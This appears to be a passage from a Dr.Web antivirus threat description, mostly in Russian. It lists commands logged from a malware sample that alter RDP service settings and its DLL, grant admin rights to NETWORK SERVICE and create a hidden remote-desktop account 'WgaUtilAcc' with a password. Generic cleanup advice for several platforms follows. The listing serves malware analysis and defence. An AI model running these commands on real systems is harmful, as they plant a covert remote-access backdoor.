  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
  • '<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
  • '<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  • '<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "%ProgramFiles%\windows mail\appcache.xml" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  • '<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  • '<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  • '<SYSTEM32>\cmd.exe' /c cmd/c net start rdpdr
  • '<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
  • '<SYSTEM32>\cmd.exe' /c net start rdpdr
  • '<SYSTEM32>\net1.exe' start rdpdr
  • '<SYSTEM32>\cmd.exe' /c cmd/c net start TermService
  • '<SYSTEM32>\cmd.exe' /c net start TermService
  • '<SYSTEM32>\net.exe' start TermService
  • '<SYSTEM32>\net1.exe' start TermService
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 000000 /del
  • '<SYSTEM32>\net.exe' user WgaUtilAcc 000000 /del
  • '<SYSTEM32>\net1.exe' user WgaUtilAcc 000000 /del
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 6jQ5nud3 /add
  • '<SYSTEM32>\net.exe' user WgaUtilAcc 6jQ5nud3 /add
  • '<SYSTEM32>\net1.exe' user WgaUtilAcc 6jQ5nud3 /add
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  • '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  • '<SYSTEM32>\net.exe' start rdpdr
  • '<SYSTEM32>\ie4uinit.exe' -BaseSettings
  • '<SYSTEM32>\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке